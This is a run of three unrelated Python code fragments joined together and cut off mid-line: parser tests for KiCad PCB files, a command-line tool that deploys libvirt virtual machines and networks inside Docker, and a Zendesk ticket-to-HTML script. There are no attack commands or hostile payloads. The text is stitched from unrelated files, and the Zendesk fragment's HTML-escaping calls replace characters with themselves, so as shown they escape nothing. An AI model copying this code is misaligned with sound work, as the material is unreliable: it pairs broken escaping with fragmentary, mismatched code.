pcb = PCB()
visitor = ParserVisitor(pcb)
with patch.object(PCB, 'visitVia', return_value=None) as mock_method:
text_effects = visitor.node('via', sexp_str)
mock_method.assert_called_once_with(TrackVia(
via_type='', locked=False, at=(69.088, 112.776), size=0.8,
drill=0.4, layers=['F.Cu', 'B.Cu'],
remove_unused_layers=False, keep_end_layers=False, free=False,
net=23, tstamp='f220d6a7-3170-4e04-8de6-2df0c3962fe0'))
def test_parse_net(self):
INPUT_STRINGG = """ (net 39 "unconnected-(P2-Pad2)")"""
sexp_str = load_tree(INPUT_STRINGG)
pcb = PCB()
visitor = ParserVisitor(pcb)
with patch.object(PCB, 'visitNet', return_value=None) as mock_method:
text_effects = visitor.node('net', sexp_str)
mock_method.assert_called_once_with(Net(ordinal=39, netname='unconnected-(P2-Pad2)'))
def test_parse_gr_lines(self):
INPUT_STRINGG = """ (gr_line (start 50.8 50.8) (end 50.8 158.98) (layer "Edge.Cuts") (width 0.15) (tstamp 00000000-0000-0000-0000-000060977f7d))"""
sexp_str = load_tree(INPUT_STRINGG)
pcb = PCB()
visitor = ParserVisitor(pcb)
with patch.object(PCB, 'visitPcbGraphicalLine', return_value=None) as mock_method:
text_effects = visitor.node('gr_line', sexp_str)
mock_method.assert_called_once_with(PcbGraphicalLine(
start=(50.8, 50.8), end=(50.8, 158.98), angle=0, width=0.15,
layer='Edge.Cuts', tstamp='00000000-0000-0000-0000-000060977f7d'))
def test_parse_footprint(self):
INPUT_STRING = """ (footprint "Capacitor_THT:CP_Axial_L18.0mm_D6.5mm_P25.00mm_Horizontal" (layer "F.Cu")
(tedit 5A533291) (tstamp 00000000-0000-0000-0000-000054032b86)
(at 110.49 78.867 180)
(descr "CP, Axial series, Axial, Horizontal, pin pitch=25mm, , length*diameter=18*6.5mm^2, Electrolytic Capacitor, , http://www.vishay.com/docs/28325/021asm.pdf")
(tags "CP Axial series Axial Horizontal pin pitch 25mm length 18mm diameter 6.5mm Electrolytic Capacitor")
(property "Sheetfile" "pic_programmer.kicad_sch")
(property "Sheetname" "")
(path "/00000000-0000-0000-0000-0000442a5056")
(attr through_hole)
(fp_text reference "C1" (at 12.5 -4.31 180) (layer "F.SilkS")
(effects (font (size 1 1) (thickness 0.15)))
(tstamp a6f1cee4-350a-49d7-858b-50d3e3d852dc)
)
(fp_text value "100µF" (at 12.5 4.31 180) (layer "F.Fab")
(effects (font (size 1 1) (thickness 0.15)))
(tstamp 6714d3d0-67c3-4e88-bf4d-4c5f778e0892)
)
(fp_text user "${REFERENCE}" (at 12.5 0 180) (layer "F.Fab")
(effects (font (size 1 1) (thickness 0.15)))
(tstamp bc27282e-eeb3-4ed4-b421-f3a6eaa2e2b5)
)
(fp_line (start 3.38 3.37) (end 5.18 3.37) (layer "F.SilkS") (width 0.12) (tstamp 3462ecc2-1bae-4a89-9f65-63a9e667d09c))
(fp_line (start 6.98 -3.37) (end 21.62 -3.37) (layer "F.SilkS") (width 0.12) (tstamp 4d1afc95-4219-4bbd-9746-9af92b8382e5))
(fp_line (start 1.44 0) (end 3.38 0) (layer "F.SilkS") (width 0.12) (tstamp 58df7ef1-b92a-49a0-8639-c0c281311c8c))
(fp_line (start 5.18 3.37) (end 6.08 2.47) (layer "F.SilkS") (width 0.12) (tstamp 8959f01b-661c-44a4-a6b5-b57e597117d1))
(fp_line (start 6.08 2.47) (end 6.98 3.37) (layer "F.SilkS") (width 0.12) (tstamp 928467d1-ef81-4aa0-b95a-3562ac729310))
(fp_line (start 6.08 -2.47) (end 6.98 -3.37) (layer "F.SilkS") (width 0.12) (tstamp 9f77a334-8c05-44eb-8734-b02323623980))
(fp_line (start 3.38 -3.37) (end 5.18 -3.37) (layer "F.SilkS") (width 0.12) (tstamp a5ffbea5-7343-4e67-95ca-798ecf1a31fd))
(fp_line (start 2.18 -3.5) (end 2.18 -1.7) (layer "F.SilkS") (width 0.12) (tstamp b2ac688b-7bb5-4f97-83f4-4421e72e5ebf))
(fp_line (start 23.56 0) (end 21.62 0) (layer "F.SilkS") (width 0.12) (tstamp bffcf4d1-909b-4c58-a5be-6561a7007f9d))
(fp_line (start 6.98 3.37) (end 21.62 3.37) (layer "F.SilkS") (width 0.12) (tstamp c4dcabfd-61e1-4503-9ff2-b41ab53d91aa))
(fp_line (start 3.38 -3.37) (end 3.38 3.37) (layer "F.SilkS") (width 0.12) (tstamp d75f58b8-4e6d-4e45-b9c3-b942ded81af0))
(fp_line (start 5.18 -3.37) (end 6.08 -2.47) (layer "F.SilkS") (width 0.12) (tstamp e0db893c-3ed0-4514-88f8-12392d977eb3))
(fp_line (start 1.28 -2.6) (end 3.08 -2.6) (layer "F.SilkS") (width 0.12) (tstamp e67045ec-7ac2-4e58-adbd-ba06b515c475))
(fp_line (start 21.62 -3.37) (end 21.62 3.37) (layer "F.SilkS") (width 0.12) (tstamp e7e8636e-8a1d-4bd2-9304-51c7bf88ca86))
(fp_line (start 26.45 3.65) (end 26.45 -3.65) (layer "F.CrtYd") (width 0.05) (tstamp 5a03366f-05a8-4568-93d7-90ee54ce1ff3))
(fp_line (start 26.45 -3.65) (end -1.45 -3.65) (layer "F.CrtYd") (width 0.05) (tstamp e12abc24-3857-4264-8f78-760101a7cc3a))
(fp_line (start -1.45 -3.65) (end -1.45 3.65) (layer "F.CrtYd") (width 0.05) (tstamp f10e3c6e-61e7-4406-8325-82fe978579b0))
(fp_line (start -1.45 3.65) (end 26.45 3.65) (layer "F.CrtYd") (width 0.05) (tstamp fe3f3336-5cdc-4945-bb13-258cab45397b))
(fp_line (start 5.18 -3.25) (end 6.08 -2.35) (layer "F.Fab") (width 0.1) (tstamp 01242f51-9ef5-41ff-8af9-2bdf66835e68))
(fp_line (start 6.98 -3.25) (end 21.5 -3.25) (layer "F.Fab") (width 0.1) (tstamp 06c3c0e6-7385-4c0b-9f22-d75dd843999d))
(fp_line (start 6.98 3.25) (end 21.5 3.25) (layer "F.Fab") (width 0.1) (tstamp 09b3b400-f689-4913-9c2a-b2fb5a9c8fe9))
(fp_line (start 5.2 0) (end 7 0) (layer "F.Fab") (width 0.1) (tstamp 1cd0ab3b-0f4f-4cc1-9e4e-c3de697a4b0c))
(fp_line (start 0 0) (end 3.5 0) (layer "F.Fab") (width 0.1) (tstamp 370894ef-352b-48a4-96be-27098b7d9461))
(fp_line (start 3.5 3.25) (end 5.18 3.25) (layer "F.Fab") (width 0.1) (tstamp 3c84e368-3edc-42e0-8982-20119cfb45c2))
(fp_line (start 5.18 3.25) (end 6.08 2.35) (layer "F.Fab") (width 0.1) (tstamp 58f08ba5-d0e3-43fb-8beb-54efdce75f59))
(fp_line (start 6.08 -2.35) (end 6.98 -3.25) (layer "F.Fab") (width 0.1) (tstamp 5bf8b68b-0b4d-40fe-a110-744583af3d4a))
(fp_line (start 3.5 -3.25) (end 3.5 3.25) (layer "F.Fab") (width 0.1) (tstamp 6854b04c-649e-4a30-b3ab-bda4116a5800))
(fp_line (start 3.5 -3.25) (end 5.18 -3.25) (layer "F.Fab") (width 0.1) (tstamp 8c26551c-34ed-4948-86f2-5130f204da63))
(fp_line (start 21.5 -3.25) (end 21.5 3.25) (layer "F.Fab") (width 0.1) (tstamp 95b82f4c-5c3b-488f-bcd4-94fa52f1c68a))
(fp_line (start 25 0) (end 21.5 0) (layer "F.Fab") (width 0.1) (tstamp acf4f9ad-dce8-45ef-b6fe-68166c97c929))
(fp_line (start 6.08 2.35) (end 6.98 3.25) (layer "F.Fab") (width 0.1) (tstamp b1538173-2109-4b6b-b681-1a93dc0f2cb2))
(fp_line (start 6.1 -0.9) (end 6.1 0.9) (layer "F.Fab") (width 0.1) (tstamp bbf21b15-3165-4683-902a-e1e739cc2923))
(pad "1" thru_hole rect locked (at 0 0 180) (size 2.4 2.4) (drill 1.2) (layers *.Cu *.Mask)
(net 17 "VCC") (pintype "passive") (tstamp d6f6699b-7183-4350-ba44-c47e828a3a04))
(pad "2" thru_hole oval locked (at 25 0 180) (size 2.4 2.4) (drill 1.2) (layers *.Cu | |
#!/usr/bin/env python2.7
"""
generate files to deploy libvirt vms and nws, possibly in a docker environment
"""
from __future__ import print_function
import logging
import os
import shutil
import sys
import shlex
import argparse
from copy import deepcopy
from enum import Enum
from lxml import etree
import argh
from argh.decorators import arg, named
from argh.exceptions import CommandError
from etconfig import ElementConfError, load, id2elt
from qdeploy.utils import cmd, resource_path
try: # py3
from shlex import quote as sh_quote
except ImportError: # py2
from pipes import quote as sh_quote
# pylint: disable=invalid-name
logger = logging.getLogger(__name__)
logging.basicConfig(handlers=[logging.StreamHandler()], level=logging.DEBUG)
conf = None
# directory containing
# - the files needed to build the docker container
# -
QDEPLOY_RESOURCES_DIR = ".qdeploy"
QDEPLOY_CONF = "./qdeploy.conf"
QDEPLOY_DEFAULT_CONTAINER_NAME = "qdeploy"
def vm_extend(vm, vm_defaults):
"""add to vm the parameters from vm_defaults that are not defined in
vm.
:param vm: Element representing the vm parameters
:param vm_defaults: Element representing the vm default parameters
"""
for arg_i in list(vm_defaults):
if vm.find(arg_i.tag) is None:
vm.append(deepcopy(arg_i))
def get_vm_group(group_name):
"""find a group of name in conf
"""
root = conf
elems = root.findall('./group[name="{}"]/vm'.format(group_name))
if elems is None:
return []
res_elem_list = [e.text for e in elems]
return res_elem_list
def find_elem_list(tag, name_list, _all=False):
"""find a list of Element with:
:param tag: Element tag to find
:param name_list: names of Element to find
:param _all: (Default value = False)
The form is:
<{tag}><name>text</name></{tag}>
"""
if name_list is None:
name_list = []
root = conf
res_elem_list = []
if _all and len(name_list) > 0:
raise CommandError("Cannot have both '-all' and a list of names")
if not _all and len(name_list) == 0:
raise CommandError("Must have either '-all' or a list of names")
for name in name_list:
res = root.find('./{}[name="{}"]'.format(tag, name))
if res is None:
raise CommandError("{} '{} not found'".format(tag, name))
res_elem_list.append(res)
if _all:
res_elem_list = root.findall(tag)
return res_elem_list
def generate_network_xml_file(resource_dir, nw):
"""generate libvirt xml file to defina a network
:param resource_dir: target directory
:param nw: Element representing the xml to produce
:returns: the absolute path+name of the file
"""
name = nw.find('name').text
xml = etree.tostring(nw, pretty_print=True)
xml_file_name = os.path.join(resource_dir, "nw-" + name + ".xml")
print(xml_file_name)
print(os.getcwd())
with open(xml_file_name, 'w+') as xml_file:
xml_file.write(xml)
return xml_file_name
def is_running_in_docker():
"""check if the qdeploy.conf file defines a docker environment
"""
root = conf
docker = root.find("docker")
return docker is not None
def run_in_container(a_cmd, _interactive=False, _detached=False):
"""execute a system command possibly inside the docker container
:param a_cmd:
:param _interactive: (Default value = False)
"""
if is_running_in_docker():
opts = "-ti" if _interactive else "-t"
container_name = get_container_name()
if not container_name:
raise CommandError("No docker container name defined in qdeploy.conf")
container_exec = ["docker", "exec", opts, container_name]
if isinstance(a_cmd, str):
a_cmd = shlex.split(a_cmd)
cmd_to_execute = container_exec + a_cmd
else:
cmd_to_execute = a_cmd
res = cmd(cmd_to_execute, _log=logger, _detached=_detached)
if _detached:
res.wait()
res.print_on_error()
return res
def generate_virt_install_cmd(vm, vm_defaults, extra_args=None):
"""generate vm xml using virt-install
:param vm: Element node representing vm
:param vm_defaults:
:returns: an array representing the virt-install command to import
the vm.
"""
if not extra_args:
etree.SubElement(vm, 'import')
extra_args = []
# etree.SubElement(vm, 'transient')
# etree.SubElement(vm, 'noautoconsole')
cmd_array = ['virt-install']
name = vm.find('name').text
if vm_defaults is not None:
vm_extend(vm, vm_defaults)
if vm.find("disk") is None:
# assume:
# 1. cwd mounted in the same location in docker
# 2. a qcow2 exist with the name of the vm
disk_element = etree.SubElement(vm, 'disk')
disk_element.text = os.path.join(os.getcwd(), name + ".qcow2")
for arg_i in list(vm):
cmd_array.append('--' + arg_i.tag)
val = None
if arg_i.attrib:
attrs = ",".join(["{}={}".format(k, v) for k, v in arg_i.attrib.items()])
val = attrs
else:
val = arg_i.text
if val:
cmd_array.append(sh_quote(val))
cmd_array = cmd_array + extra_args
return cmd_array
def get_container_name():
"""get container name from conf file or default name 'qdeploy' if
none provided
"""
root = conf
name_node = root.find("docker/name")
if name_node is None:
return None
if not name_node.text:
return QDEPLOY_DEFAULT_CONTAINER_NAME
return name_node.text
def do_start_docker():
"""start docker container by calling the .qdeploy/start_docker.sh
script
"""
mounts = ""
use_x11 = "false"
root = conf
container_name = get_container_name()
if not container_name:
raise CommandError("No docker container name defined in qdeploy.conf")
for m in root.iterfind("docker/mount"):
mount = m.text if ":" in m.text else m.text + ":" + m.text
mounts += " -v " + mount
x11_node = root.find("docker/x11")
if x11_node is not None:
use_x11 = x11_node.text
res = cmd(["./start_docker.sh", container_name, use_x11, mounts],
_log=logger, _cwd=QDEPLOY_RESOURCES_DIR)
res.exit_on_error()
def do_stop_docker():
"""stop docker container by calling the .qdeploy/stop_docker.sh
script
"""
os.chdir(QDEPLOY_RESOURCES_DIR)
container_name = get_container_name()
if not container_name:
raise CommandError("No docker container name defined in qdeploy.conf")
res = cmd("./stop_docker.sh {container}", container=container_name, _log=logger)
res.print_on_error()
print(res.out)
def do_start_nw(nw):
"""define and start a network
:param nw: Element representing the network in libvirt format
"""
xml_file_name = generate_network_xml_file(QDEPLOY_RESOURCES_DIR, nw)
name = nw.find('name').text
abs_path = os.path.join(os.getcwd(), xml_file_name)
# assume xml_file_name mounted in docker at the same location
run_in_container(["virsh", "net-define", "--file", abs_path])
run_in_container(["virsh", "net-start", name])
def do_stop_nw(nw):
"""stop and undefine a network
:param nw: Element representing the network in libvirt format
"""
# xml_file_name = generate_network_xml_file(QDEPLOY_RESOURCES_DIR, nw)
name = nw.find('name').text
# abs_path = os.path.join(os.getcwd(), xml_file_name)
# assume xml_file_name mounted in docker at the same location
run_in_container(["virsh", "net-destroy", name])
run_in_container(["virsh", "net-undefine", name])
def do_start_vm(vm, extra_args=None):
"""start a vm using virt-install
:param vm: Element representing the vm (xml Element that can be
directly converted to virt-install command line)
"""
root = conf
vm_defaults = root.find("vm_defaults")
virtinst_cmd = generate_virt_install_cmd(vm, vm_defaults, extra_args)
res = run_in_container(virtinst_cmd)
return res
class StopMode(Enum):
"""
possible modes to stop a vm
"""
DESTROY = 1
SHUTDOWN = 2
REBOOT = 3
def do_stop_vm(vm, stop_mode=StopMode.DESTROY):
"""undefine and stop a vm
:param vm: Element representing the vm. Only the name is actually
needed here.
"""
# root = conf
name = vm.find('name').text
if stop_mode == StopMode.DESTROY:
run_in_container(["virsh", "destroy", name])
run_in_container(["virsh", "undefine", name])
elif stop_mode == StopMode.SHUTDOWN:
run_in_container(["virsh", "shutdown", name])
run_in_container(["virsh", "undefine", name])
elif stop_mode == StopMode.REBOOT:
run_in_container(["virsh", "reboot", name])
else:
print("internal error invalid stop mode")
def assert_conf():
"""
check if config file has been loaded successfully or exit on error
"""
global conf
if conf is None:
sys.exit(1)
#----------------------------------------------------------------------
# CLI commands
#----------------------------------------------------------------------
@named("dump")
def cmd_dumpconf():
"""dump qdeploy.conf to xml. debug purpose"""
global conf
assert_conf()
print(conf.toxml())
@named("init")
def cmd_init(force=False):
"""writes files needed by 'env-start' to '.qdeploy/' directory
"""
# :param force: overwrite existing conf if True (Default value =
# False)
assert_conf()
resources_path = resource_path('resources')
if os.path.isdir(QDEPLOY_RESOURCES_DIR):
if force:
shutil.rmtree(QDEPLOY_RESOURCES_DIR)
else:
print ("Error: {} already existing. use -force".
format(QDEPLOY_RESOURCES_DIR))
sys.exit(1)
print("=> Copying resources to {resources}".format(
resources=QDEPLOY_RESOURCES_DIR))
shutil.copytree(resources_path, QDEPLOY_RESOURCES_DIR)
@named("start")
def cmd_start():
"""
start docker environment, then all networks and all vms
"""
assert_conf()
cmd_init(force=True)
cmd_start_env()
cmd_start_nw(net_names=None, start_all=True)
cmd_start_vm(vm_names=None, start_all=True)
@named("stop")
def cmd_stop():
"""
stop docker environment, then all networks and all vms
"""
assert_conf()
cmd_stop_env()
@named("env-start")
def cmd_start_env():
"""
start docker container
"""
assert_conf()
root = conf
if is_running_in_docker():
do_start_docker()
for c in root.iterfind("docker/start_cmd"):
run_in_container(c.text)
for c in root.iterfind("start_cmd"):
cmd(c.text, _log=logger)
@named("env-stop")
def cmd_stop_env():
"""
stop docker container
"""
assert_conf()
root = conf
if is_running_in_docker():
do_stop_docker()
for c in root.iterfind("docker/stop_cmd"):
run_in_container(c.text)
for c in root.iterfind("stop_cmd"):
cmd(c.text, _log=logger)
@named("vm-list")
def cmd_list_vm():
"""display vms in qdeploy.conf
"""
# :param list_all: (Default value = False)
assert_conf()
root = conf
for n in root.iterfind("vm/name"):
print(n.text)
@named("net-list")
def cmd_list_nw():
"""display networks in qdeploy.conf
"""
# :param net_names:
# :param list_all: (Default value = False)
assert_conf()
root = conf
for n in root.iterfind("network/name"):
print(n.text)
@named("vm-start")
@arg("vm_names", nargs='*')
@arg("-a", "--all", dest="start_all")
def cmd_start_vm(vm_names, start_all=False, group=None):
"""start one or several vms
"""
# :param vm_names: list of vm names
# :param start_all: start all if True (Default value = False)
assert_conf()
if group is not None:
vm_names = get_vm_group(group)
vm_list = find_elem_list("vm", vm_names, start_all)
for vm in vm_list:
do_start_vm(vm)
@named("vm-install")
@arg("vm_name")
@arg('args', nargs=argparse.REMAINDER, help="extra virt-install args")
def cmd_install_vm(vm_name, args):
"""install a vm
"""
# :param vm_name: list of name to install
# :param rest: install parameters
assert_conf()
print(args)
vm_list = find_elem_list("vm", [vm_name])
do_start_vm(vm_list[0], args)
@named("vm-stop")
@arg("vm_names", nargs='*', help="names of the vms to stop")
@arg("-a", "--all", dest="stop_all", help="stop all vms defined in qdeploy.conf")
@arg("-s", "--shutdown")
@arg("-r", "--reboot")
def cmd_stop_vm(vm_names, stop_all=False, shutdown=False, reboot=False, group=None):
"""stop and undefine one or several vms. By default the vm is destroyed.
"""
assert_conf()
if shutdown and reboot:
raise CommandError("Cannot have both '--shutdown' and '--reboot'")
if shutdown:
stop_mode = StopMode.SHUTDOWN
elif reboot:
stop_mode = StopMode.REBOOT
else:
stop_mode = StopMode.DESTROY
if group is not None:
vm_names = get_vm_group(group)
vm_list = find_elem_list("vm", vm_names, stop_all)
for vm in vm_list:
do_stop_vm(vm, stop_mode)
@named("net-start")
@arg("net_names", nargs='*')
@arg("-a", "--all", dest="start_all")
def cmd_start_nw(net_names, | |
Set"
notSet = False
requestseverity = sev
requestsubject_temps = str(d["ticket"]["subject"]).replace("&", "&").replace("<", "<").replace('"', """).replace("'", "'").replace(">", ">")
requestsubject = str(requestsubject_temps)
requestdescription_temps = str(d["ticket"]["description"])
requestdescription = str(requestdescription_temps).replace("&", "&").replace("<", "<").replace('"', """).replace("'", "'").replace(">", ">").replace("\n\n \n\n \n\n \n\n", "<br/><br/>").replace("\n\n \n\n \n\n", "<br/><br/>").replace("\n\n \n\n \n", "<br/><br/>").replace("\n\n \n\n", "<br/><br/>").replace("\n\n", "<br/><br/>").replace("\n", "<br/>")
requestorganization_id = str(d["ticket"]["organization_id"])
requestrequester_id = str(d["ticket"]["requester_id"])
requestcreated_at = str(d["ticket"]["created_at"]).replace("T", " ").replace("Z", "")
requestupdated_at = str(d["ticket"]["updated_at"]).replace("T", " ").replace("Z", "")
requestassignee_id = str(d["ticket"]["assignee_id"])
except:
conn.request("GET", "/api/v2/requests/" + ticketURLid + ".json", headers=headers_ticket)
res = conn.getresponse()
data = res.read()
request_raw = data.decode("utf-8")
data_dict = json.loads(str(request_raw))
data = json.dumps(data_dict, indent=2)
d = json.loads(data)
requestid = str(d["request"]["id"])
requeststatus = str(d["request"]["status"])
requestpriority = str(d["request"]["priority"])
# requestseverity = str(d["request"]["severity"])
requestsubject_temps = str(d["request"]["subject"])
requestsubject = str(requestsubject_temps).replace("&", "&").replace("<", "<").replace('"', """).replace("'", "'").replace(">", ">")
requestdescription_temps = str(d["request"]["description"])
requestdescription = str(requestdescription_temps).replace("&", "&").replace("<", "<").replace('"', """).replace("'", "'").replace(">", ">").replace("\n\n \n\n \n\n \n\n", "<br/><br/>").replace("\n\n \n\n \n\n", "<br/><br/>").replace("\n\n \n\n \n", "<br/><br/>").replace("\n\n \n\n", "<br/><br/>").replace("\n\n", "<br/><br/>").replace("\n", "<br/>")
requestorganization_id = str(d["request"]["organization_id"])
requestrequester_id = str(d["request"]["requester_id"])
requestcreated_at = str(d["request"]["created_at"]).replace("T", " ").replace("Z", "")
requestupdated_at = str(d["request"]["updated_at"]).replace("T", " ").replace("Z", "")
requestassignee_id = str(d["request"]["assignee_id"])
request_id = str(requestid)
request_status = str(requeststatus)
request_priority = str(requestpriority)
# request_severity = str(requestseverity)
request_severity = ("Not set")
request_subject = str(requestsubject)
request_desc = str(requestdescription)
desc = str(request_desc)
request_org = str(requestorganization_id)
request_requestor = str(requestrequester_id)
request_created = str(requestcreated_at)
request_updated = str(requestupdated_at)
# To get the name of the requester given the requesterID
headers_users = {
'email_address': _configDef['zdesk_config']['zdesk_email'] + "/token",
'password': (_configDef['zdesk_config']['zdesk_password']),
'authorization': _configDef['zdesk_config']['zdesk_auth'],
'content-type': "application/json"
}
conn.request("GET", "/api/v2/users/" + request_requestor, headers=headers_users)
res = conn.getresponse()
userRequesterId = res.read()
tempUserRequester = str(userRequesterId.decode('utf-8'))
# data = json.dumps(tempUserRequester, indent=2)
# data_dict = ast.literal_eval(data)
data_dict = json.loads(str(tempUserRequester))
data = json.dumps(data_dict, indent=2)
d = json.loads(data)
req_name = str(d["user"]["name"])
requesterName = req_name
try:
request_assignee = str(requestassignee_id)
# To get the name of the assignee given the assigneeID
conn.request("GET", "/api/v2/users/" + request_assignee, headers=headers)
res = conn.getresponse()
userAssigneeId = res.read()
tempUserAssignee = str(userAssigneeId.decode('utf-8'))
# data = json.dumps(tempUserAssignee, indent=2)
# data_dict = ast.literal_eval(data)
data_dict = json.loads(str(tempUserAssignee))
data = json.dumps(data_dict, indent=2)
d = json.loads(str(data))
assign_name = str(d["user"]["name"])
assigneeName = assign_name
except:
assigneeName = "Not assigned"
assignee_flag = True
requesterTicket = (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "/requester/requested_tickets"
assigneeTicket = (_configDef['zdesk_config']['zdesk_url']) + "/agent/users/" + request_assignee + "/assigned_tickets"
OrgTicket = (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "/organization/tickets"
# Convert the Zendesk ID to company name
headers_org = {
'email_address': _configDef['zdesk_config']['zdesk_email'] + "/token",
'password': (_configDef['zdesk_config']['zdesk_password']),
'authorization': _configDef['zdesk_config']['zdesk_auth'],
'content-type': "application/json"
}
conn.request("GET", "/api/v2/users/" + requestrequester_id + "/organizations.json", headers=headers_org)
res = conn.getresponse()
companyID = res.read()
compNameRaw = str(companyID.decode("utf-8"))
data_dict = json.loads(str(compNameRaw))
data = json.dumps(data_dict, indent=2)
# data_dict = ast.literal_eval(data)
d = json.loads(data)
try:
org_Name = str(d["organizations"][0]["name"])
org_name_temp = str(org_Name).replace("&", "&").replace("<", "<").replace('"', """).replace("'", "'").replace(">", ">")
orgName = str(org_name_temp)
#print(orgName)
except:
orgName = "Company not yet created"
# table_body = ""
# table_header = "<table style='border-collapse:collapse;border:2px solid black;table-layout:auto;width:100%;box-shadow: 5px 5px'><thead><tr style='background-color:#4D94FF;color:#ffffff;font-size:1rem' class=\"tempo-text-color--white tempo-bg-color--black\">" \
# "<td style='width:20%;border:1px solid blue;border-bottom: double blue;text-align:center'>SUBJECT</td>" \
# "<td style='width:30%;border:1px solid blue;border-bottom: double blue;text-align:center'>DESCRIPTION</td>" \
# "<td style='width:2.5%;border:1px solid blue;border-bottom: double blue;text-align:center'>ID</td>" \
# "<td style='width:3%;border:1px solid blue;border-bottom: double blue;text-align:center'>STATUS</td>" \
# "<td style='width:3%;border:1px solid blue;border-bottom: double blue;text-align:center'>PRIORITY</td>" \
# "<td style='width:3.5%;border:1px solid blue;border-bottom: double blue;text-align:center'>SEVERITY</td>" \
# "<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>COMPANY</td>" \
# "<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>REQUESTER</td>" \
# "<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>CREATED</td>" \
# "<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>UPDATED</td>" \
# "<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>ASSIGNEE</td>" \
# "</tr></thead><tbody>"
#
# if assignee_flag:
#
# table_body += "<tr>" \
# "<td style='border:1px solid black;text-align:left'>" + request_subject + "</td>" \
# "<td style='border:1px solid black;text-align:left'>" + desc + "</td>" \
# "<td style='border:1px solid black;text-align:center'><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a></td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_status + "</td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_priority + "</td>" \
# "<td style='border:1px solid black;text-align:center'>" + str(request_severity) + "</td>" \
# "<td style='border:1px solid black;text-align:center'><a href=\"" + OrgTicket + "\">" + orgName + "</a></td>" \
# "<td style='border:1px solid black;text-align:center'><a href=\"" + requesterTicket + "\">" + str(requesterName) + "</a></td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_created + "</td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_updated + "</td>" \
# "<td style='border:1px solid black;text-align:center'>" + assigneeName + "</td>" \
# "</tr>" \
# "</tbody></table>"
#
# else:
# table_body += "<tr>" \
# "<td style='border:1px solid black;text-align:left'>" + request_subject + "</td>" \
# "<td style='border:1px solid black;text-align:left'>" + desc + "</td>" \
# "<td style='border:1px solid black;text-align:center'><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a></td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_status + "</td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_priority + "</td>" \
# "<td style='border:1px solid black;text-align:center'>" + str(request_severity) + "</td>" \
# "<td style='border:1px solid black;text-align:center'><a href=\"" + OrgTicket + "\">" + orgName + "</a></td>" \
# "<td style='border:1px solid black;text-align:center'><a href=\"" + requesterTicket + "\">" + str(requesterName) + "</a></td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_created + "</td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_updated + "</td>" \
# "<td style='border:1px solid black;text-align:center'><a href=\"" + assigneeTicket + "\">" + str(assigneeName) + "</a></td>" \
# "</tr>" \
# "</tbody></table>"
#
# reply_raw = table_header + table_body
###############
if assignee_flag:
table_header = "<table style='border-collapse:collapse;border:2px solid black;table-layout:auto;width:100%;box-shadow: 5px 5px'><thead><tr style='background-color:#4D94FF;color:#ffffff;font-size:1rem' class=\"tempo-text-color--white tempo-bg-color--black\">" \
"<td style='width:15%;border:1px solid blue;border-bottom: double blue;text-align:center'>SUBJECT</td>" \
"<td style='border:1px solid black;text-align:left'>" + str(request_subject) + "</td></tr><tr>" \
"<td style='border:1px solid black;text-align:left' colspan=\"2\">" + str(request_desc) + "</td></tr><tr>" \
"<td style='width:3%;border:1px solid blue;border-bottom: double blue;text-align:center'>ID</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a></td></tr><tr>" \
"<td style='width:4%;border:1px solid blue;border-bottom: double blue;text-align:center'>STATUS</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(requeststatus) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>PRIORITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_priority) + "</td></tr><tr>" \
"<td style='width:4.5%;border:1px solid blue;border-bottom: double blue;text-align:center'>SEVERITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_severity) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>COMPANY</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(OrgTicket) + "\">" + str(orgName) + "</a></td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>REQUESTER</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(requesterTicket) + "\">" + str(requesterName) + "</a></td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>CREATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_created) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>UPDATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_updated) + "</td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>ASSIGNEE</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(assigneeName) + "</td>" \
"</tr></thead><tbody></tbody></table>"
else:
table_header = "<table style='border-collapse:collapse;border:2px solid black;table-layout:auto;width:100%;box-shadow: 5px 5px'><thead><tr style='background-color:#4D94FF;color:#ffffff;font-size:1rem' class=\"tempo-text-color--white tempo-bg-color--black\">" \
"<td style='width:15%;border:1px solid blue;border-bottom: double blue;text-align:center'>SUBJECT</td>" \
"<td style='border:1px solid black;text-align:left'>" + str(request_subject) + "</td></tr><tr>" \
"<td style='border:1px solid black;text-align:left' colspan=\"2\">" + str(request_desc) + "</td></tr><tr>" \
"<td style='width:3%;border:1px solid blue;border-bottom: double blue;text-align:center'>ID</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a></td></tr><tr>" \
"<td style='width:4%;border:1px solid blue;border-bottom: double blue;text-align:center'>STATUS</td>" \
